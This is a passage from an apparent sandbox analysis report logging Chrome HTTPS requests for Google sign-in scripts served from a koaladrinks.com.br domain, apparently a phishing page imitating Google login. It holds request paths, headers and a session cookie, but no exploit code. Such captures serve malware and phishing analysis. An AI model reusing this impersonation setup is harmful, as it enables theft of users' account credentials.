                                                      2025-01-10 08:27:46 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:27:46 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:27:46 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:27:46 UTC46INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a
                                                      Data Ascii: Content-Type: text/javascript; charset=UTF-8
                                                      2025-01-10 08:27:46 UTC92INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 4f 70 65 6e 65 72 2d 50 6f 6c 69 63 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 3b 20 72 65 70 6f 72 74 2d 74 6f 3d 22 62 6f 71 2d 69 6e 66 72 61 2f 69 64 65 6e 74 69 74 79 2d 62 6f 71 2d 6a 73 2d 63 73 73 2d 73 69 67 6e 65 72 73 22 0d 0a
                                                      Data Ascii: Cross-Origin-Opener-Policy: same-origin; report-to="boq-infra/identity-boq-js-css-signers"
                                                      2025-01-10 08:27:46 UTC44INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 52 65 73 6f 75 72 63 65 2d 50 6f 6c 69 63 79 3a 20 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a
                                                      Data Ascii: Cross-Origin-Resource-Policy: cross-origin
                                                      2025-01-10 08:27:46 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 38 3a 32 31 3a 32 37 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 08:21:27 GMT
                                                      2025-01-10 08:27:46 UTC40INData Raw: 45 78 70 69 72 65 73 3a 20 53 61 74 2c 20 31 30 20 4a 61 6e 20 32 30 32 36 20 30 38 3a 32 31 3a 32 37 20 47 4d 54 0d 0a
                                                      Data Ascii: Expires: Sat, 10 Jan 2026 08:21:27 GMT


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      33192.168.2.949758139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:46 UTC2134OUTGET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=CMcBD,EFQ78c,EN3i8d,Fndnac,IZT63,K0PMbc,K1ZKnb,KUM7Z,L9OGUe,LDQI,LEikZe,MpJwZc,PrPYRd,Rkm0ef,SCuOPb,SpsfSb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,_b,_tp,aC1iue,b3kMqb,byfTOb,cYShmd,cciGGe,f8Gu1e,hc6Ubd,lsjVmc,lwddkf,m9oV,mvkUhe,n73qwf,pxq3x,qmdT9,siKnQd,t2srLd,vHEMJe,vfuNJf,vjKJJ,ws9Tlc,xQtZb,xiZRqc,y5vRwf,z0u0L,zbML3c,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAu [TRUNCATED]
                                                      Host: www3.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-full-version: "117.0.5938.134"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-wow64: ?0
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: same-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://ijgbload.koaladrinks.com.br/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
                                                      2025-01-10 08:27:47 UTC17INHTTP/1.1 200 OK
                                                      2025-01-10 08:27:47 UTC22INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a
                                                      Data Ascii: Accept-Ranges: bytes
                                                      2025-01-10 08:27:47 UTC12INData Raw: 41 67 65 3a 20 36 39 30 33 32 0d 0a
                                                      Data Ascii: Age: 69032
                                                      2025-01-10 08:27:47 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:27:47 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:27:47 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:27:47 UTC46INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a
                                                      Data Ascii: Content-Type: text/javascript; charset=UTF-8
                                                      2025-01-10 08:27:47 UTC92INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 4f 70 65 6e 65 72 2d 50 6f 6c 69 63 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 3b 20 72 65 70 6f 72 74 2d 74 6f 3d 22 62 6f 71 2d 69 6e 66 72 61 2f 69 64 65 6e 74 69 74 79 2d 62 6f 71 2d 6a 73 2d 63 73 73 2d 73 69 67 6e 65 72 73 22 0d 0a
                                                      Data Ascii: Cross-Origin-Opener-Policy: same-origin; report-to="boq-infra/identity-boq-js-css-signers"
                                                      2025-01-10 08:27:47 UTC44INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 52 65 73 6f 75 72 63 65 2d 50 6f 6c 69 63 79 3a 20 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a
                                                      Data Ascii: Cross-Origin-Resource-Policy: cross-origin
                                                      2025-01-10 08:27:47 UTC37INData Raw: 44 61 74 65 3a 20 54 68 75 2c 20 30 39 20 4a 61 6e 20 32 30 32 35 20 31 33 3a 31 37 3a 31 34 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Thu, 09 Jan 2025 13:17:14 GMT
                                                      2025-01-10 08:27:47 UTC40INData Raw: 45 78 70 69 72 65 73 3a 20 46 72 69 2c 20 30 39 20 4a 61 6e 20 32 30 32 36 20 31 33 3a 31 37 3a 31 34 20 47 4d 54 0d 0a
                                                      Data Ascii: Expires: Fri, 09 Jan 2026 13:17:14 GMT


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      34192.168.2.949759139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:46 UTC1259OUTGET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=_b,_tp/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=byfTOb,lsjVmc,LEikZe HTTP/1.1
                                                      Host: www3.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
                                                      2025-01-10 08:27:47 UTC17INHTTP/1.1 200 OK
                                                      2025-01-10 08:27:47 UTC22INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a
                                                      Data Ascii: Accept-Ranges: bytes
                                                      2025-01-10 08:27:47 UTC12INData Raw: 41 67 65 3a 20 39 34 36 38 32 0d 0a
                                                      Data Ascii: Age: 94682
                                                      2025-01-10 08:27:47 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:27:47 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:27:47 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:27:47 UTC46INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a
                                                      Data Ascii: Content-Type: text/javascript; charset=UTF-8
                                                      2025-01-10 08:27:47 UTC92INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 4f 70 65 6e 65 72 2d 50 6f 6c 69 63 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 3b 20 72 65 70 6f 72 74 2d 74 6f 3d 22 62 6f 71 2d 69 6e 66 72 61 2f 69 64 65 6e 74 69 74 79 2d 62 6f 71 2d 6a 73 2d 63 73 73 2d 73 69 67 6e 65 72 73 22 0d 0a
                                                      Data Ascii: Cross-Origin-Opener-Policy: same-origin; report-to="boq-infra/identity-boq-js-css-signers"
                                                      2025-01-10 08:27:47 UTC44INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 52 65 73 6f 75 72 63 65 2d 50 6f 6c 69 63 79 3a 20 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a
                                                      Data Ascii: Cross-Origin-Resource-Policy: cross-origin
                                                      2025-01-10 08:27:47 UTC37INData Raw: 44 61 74 65 3a 20 54 68 75 2c 20 30 39 20 4a 61 6e 20 32 30 32 35 20 30 36 3a 30 39 3a 34 35 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Thu, 09 Jan 2025 06:09:45 GMT
                                                      2025-01-10 08:27:47 UTC40INData Raw: 45 78 70 69 72 65 73 3a 20 46 72 69 2c 20 30 39 20 4a 61 6e 20 32 30 32 36 20 30 36 3a 30 39 3a 34 35 20 47 4d 54 0d 0a
                                                      Data Ascii: Expires: Fri, 09 Jan 2026 06:09:45 GMT


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      35192.168.2.949760139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:46 UTC1500OUTGET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=EFQ78c,IZT63,K0PMbc,KUM7Z,L9OGUe,LDQI,LEikZe,MpJwZc,PrPYRd,Rkm0ef,SCuOPb,SpsfSb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,_b,_tp,aC1iue,byfTOb,cYShmd,cciGGe,hc6Ubd,lsjVmc,lwddkf,m9oV,n73qwf,pxq3x,qmdT9,siKnQd,vHEMJe,vfuNJf,vjKJJ,ws9Tlc,xQtZb,y5vRwf,zbML3c,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZ [TRUNCATED]
                                                      Host: www3.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
                                                      2025-01-10 08:27:47 UTC17INHTTP/1.1 200 OK
                                                      2025-01-10 08:27:47 UTC22INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a
                                                      Data Ascii: Accept-Ranges: bytes
                                                      2025-01-10 08:27:47 UTC8INData Raw: 41 67 65 3a 20 32 0d 0a
                                                      Data Ascii: Age: 2
                                                      2025-01-10 08:27:47 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:27:47 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:27:47 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:27:47 UTC46INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a
                                                      Data Ascii: Content-Type: text/javascript; charset=UTF-8
                                                      2025-01-10 08:27:47 UTC92INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 4f 70 65 6e 65 72 2d 50 6f 6c 69 63 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 3b 20 72 65 70 6f 72 74 2d 74 6f 3d 22 62 6f 71 2d 69 6e 66 72 61 2f 69 64 65 6e 74 69 74 79 2d 62 6f 71 2d 6a 73 2d 63 73 73 2d 73 69 67 6e 65 72 73 22 0d 0a
                                                      Data Ascii: Cross-Origin-Opener-Policy: same-origin; report-to="boq-infra/identity-boq-js-css-signers"
                                                      2025-01-10 08:27:47 UTC44INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 52 65 73 6f 75 72 63 65 2d 50 6f 6c 69 63 79 3a 20 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a
                                                      Data Ascii: Cross-Origin-Resource-Policy: cross-origin
                                                      2025-01-10 08:27:47 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 38 3a 32 37 3a 34 35 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 08:27:45 GMT
                                                      2025-01-10 08:27:47 UTC40INData Raw: 45 78 70 69 72 65 73 3a 20 53 61 74 2c 20 31 30 20 4a 61 6e 20 32 30 32 36 20 30 38 3a 32 37 3a 34 35 20 47 4d 54 0d 0a
                                                      Data Ascii: Expires: Sat, 10 Jan 2026 08:27:45 GMT


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      36192.168.2.949761139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:47 UTC2155OUTGET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=CMcBD,E87wgc,EFQ78c,EN3i8d,Fndnac,IZT63,K0PMbc,K1ZKnb,KUM7Z,L9OGUe,LDQI,LEikZe,MpJwZc,PHUIyb,PrPYRd,Rkm0ef,SCuOPb,SD8Jgb,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,YgOFye,_b,_tp,aC1iue,b3kMqb,bTi8wc,byfTOb,cYShmd,cciGGe,f8Gu1e,hc6Ubd,lsjVmc,ltDFwf,lwddkf,m9oV,mvkUhe,n73qwf,oqkvIf,pxq3x,qPYxq,qmdT9,rmumx,siKnQd,soHxf,t2srLd,vHEMJe,vfuNJf,vjKJJ,ws9Tlc,xQtZb,xiZRqc,y5vRwf,yRXbo,ywOR5c,z0u0L,zbML3c,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb [TRUNCATED]
                                                      Host: www3.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-full-version: "117.0.5938.134"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-wow64: ?0
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: same-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://ijgbload.koaladrinks.com.br/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
                                                      2025-01-10 08:27:48 UTC17INHTTP/1.1 200 OK
                                                      2025-01-10 08:27:48 UTC22INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a
                                                      Data Ascii: Accept-Ranges: bytes
                                                      2025-01-10 08:27:48 UTC12INData Raw: 41 67 65 3a 20 39 34 36 38 32 0d 0a
                                                      Data Ascii: Age: 94682
                                                      2025-01-10 08:27:48 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:27:48 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:27:48 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:27:48 UTC46INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a
                                                      Data Ascii: Content-Type: text/javascript; charset=UTF-8
                                                      2025-01-10 08:27:48 UTC92INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 4f 70 65 6e 65 72 2d 50 6f 6c 69 63 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 3b 20 72 65 70 6f 72 74 2d 74 6f 3d 22 62 6f 71 2d 69 6e 66 72 61 2f 69 64 65 6e 74 69 74 79 2d 62 6f 71 2d 6a 73 2d 63 73 73 2d 73 69 67 6e 65 72 73 22 0d 0a
                                                      Data Ascii: Cross-Origin-Opener-Policy: same-origin; report-to="boq-infra/identity-boq-js-css-signers"
                                                      2025-01-10 08:27:48 UTC44INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 52 65 73 6f 75 72 63 65 2d 50 6f 6c 69 63 79 3a 20 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a
                                                      Data Ascii: Cross-Origin-Resource-Policy: cross-origin
                                                      2025-01-10 08:27:48 UTC37INData Raw: 44 61 74 65 3a 20 54 68 75 2c 20 30 39 20 4a 61 6e 20 32 30 32 35 20 30 36 3a 30 39 3a 34 36 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Thu, 09 Jan 2025 06:09:46 GMT
                                                      2025-01-10 08:27:48 UTC40INData Raw: 45 78 70 69 72 65 73 3a 20 46 72 69 2c 20 30 39 20 4a 61 6e 20 32 30 32 36 20 30 36 3a 30 39 3a 34 36 20 47 4d 54 0d 0a
                                                      Data Ascii: Expires: Fri, 09 Jan 2026 06:09:46 GMT


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      37192.168.2.949763139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:47 UTC2194OUTGET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=CMcBD,E87wgc,EFQ78c,EN3i8d,Fndnac,IZT63,K0PMbc,K1ZKnb,KUM7Z,L9OGUe,LDQI,LEikZe,LvGhrf,MpJwZc,PHUIyb,PrPYRd,Rkm0ef,RqjULd,SCuOPb,SD8Jgb,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,YgOFye,_b,_tp,aC1iue,b3kMqb,bTi8wc,byfTOb,cYShmd,cciGGe,f8Gu1e,hc6Ubd,lsjVmc,ltDFwf,lwddkf,m9oV,mvkUhe,n73qwf,oqkvIf,p3hmRc,pxq3x,qPYxq,qmdT9,rmumx,siKnQd,soHxf,t2srLd,vHEMJe,vfuNJf,vjKJJ,ws9Tlc,xQtZb,xiZRqc,y5vRwf,yRXbo,ywOR5c,z0u0L,zbML3c,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b [TRUNCATED]
                                                      Host: www3.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
